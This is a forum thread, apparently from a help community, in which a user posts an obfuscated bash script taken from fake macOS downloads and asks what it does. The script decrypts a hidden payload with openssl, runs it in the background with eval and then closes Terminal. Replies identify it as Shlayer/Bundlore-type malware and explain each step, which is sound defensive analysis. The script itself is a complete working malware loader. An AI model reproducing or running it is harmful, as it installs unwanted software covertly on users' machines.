What does this command do? I've seen it in a lot of fake downloads, and I'm wondering how it works

Applications Cybersecurity
1

What does this do (i think its malware someone pls explain how it works)

#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19lI1c3x5jsG75i2MqkEp6BnnsxbYhGNNEAue1FVJV9tb3iame0XC4MkHJBluNzxrzAHRIaEfLdG53m5HsoftQYM86oQ4DmCvzHTgXbModNxL5uT4skXGdepJjnAsnKaUrG+Sg0H38NX5Dx9QOJHOH7rLY84emrHDWF9td75Urxvq2PNxO4X88LXHuV/IlXeoAbPhgkhNiBS9s6k8VP7p1RR1q/Ld1ySGmcvvoNXIGrHqEwGndAs/ZmXs2BMLQQ4yPxiqiG07CJfwUjzpgEirZOPfJ3BkixdvkurFrm+8jM5uWYPrP5fmZV8zsxtvOmgEyztEbZE0GDurvXuVaMyrsfGlWo5KVeiP9aW5dbjmuWEnm2SBz+H/NPa4UL56qwl6oe9K6yErvM3g=='
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall  Terminal
2

Hi, welcome,

I recommend you decode it by hand and post the results.

Do not simply attempt to execute any code you don't know what the outcome is likely to be.

We look forward to seeing your results and then we can potentially move forward.

take a look at https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/

1 Like
3

You might try googling decryptedFommand. That should find you several posts going back some years.

This is malicious. Nobody would need to do this for any legitimate purpose.

The first few lines just find out stuff about your system. Then it decrypts (with openssl) a concealed command, which it then runs in the background using eval, with nohup, hiding all output, and removing the terminal you started it from.

One version of the commandArgs decrypted text downloads a MacOS .dmg (Disk Image File, similar to a .iso), installs it, and runs it. But this is a generic attack method -- the URL of the download can be changed to suit the hacker and the architecture. Also, the payload can be removed to prevent anybody finding out what it was they installed.

2 Likes
4

Only the last two commands do something real.
Put an echo in front of them to show what they do (instead of doing it), and remove the redirections to /dev/null!

1 Like
5

If you try to save this code on the mac running AVG, the results are:

Screen Shot 2022-01-28 at 4.04.25 PM

If you then google for this code, you will get:

"Bundlore" is an installer which bundles legitimate applications with offers for additional third party applications that may be unwanted by the user. Such third party applications are typically installed onto users’ computers by default, but may include an option to ‘opt-out’ during or after the installation process.

See also:

https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Bundlore/detailed-analysis

For more info, google "Bundlore-DY"... and you will find plenty on this code.

Screen Shot 2022-01-28 at 4.09.22 PM

HTH

6 Likes
6

This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.